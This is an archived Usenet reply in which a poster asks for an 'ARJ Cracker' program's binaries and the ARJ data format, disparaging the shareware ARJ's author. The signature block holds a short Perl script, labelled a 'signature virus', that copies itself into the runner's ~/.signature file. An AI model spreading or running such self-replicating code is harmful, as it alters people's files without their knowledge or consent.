Re: ARJ Cracker....

Michael Handler replied:

Re: ARJ Cracker program
>Sorry, Chris, it doesn't come with the source... I can still send
>you the MSDOS binaries if you're interested.

I am interested in the binaries are say <20K, otherwise there is too much
disassembly required.....

>I have a document that shows the ARJ data format, if that's what
>you're interested in...

That'd be WAY mega spinach cool. I have developed an extreme dislike for
ARJ and would really like to write a fully featured faster ARJ program
mainly because the one I have (2.41a) is so crippled and [IMAO] the author
is totally undeserving a single cent.

P.S. These opinions are mine. If they offend then feel free to kill-file me,
     otherwise - tough!

Chris Wedgwood <[email protected]>               Finger for PGP Key
#! /usr/bin/perl
         open(I,"$0");@a=(<I>);shift(@a) until $a[0] =~ /^#!/;
         open(I,">>$ENV{'HOME'}/.signature");print I @a;__END__
         <perl signature virus V2.0 - do 'perl -x articlename'>